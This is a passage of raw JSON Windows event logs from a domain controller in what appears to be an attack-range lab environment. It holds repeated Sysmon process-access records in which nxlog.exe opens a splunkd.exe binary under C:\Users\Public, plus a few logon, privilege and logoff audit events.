(x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:24.537","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6305,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:25.538\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:25.538","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6306,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:26.538\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:26.538","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6307,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:27.538\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:27.538","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6308,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:28.538\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:28.538","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220665,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x92BE3\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x92be3","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:56:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220666,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x92BE3\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t52685\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x92be3","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"52685","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:56:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220667,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x92BE3\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x92be3","LogonType":"3","EventReceivedTime":"2020-08-01 06:56:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6309,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:29.538\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 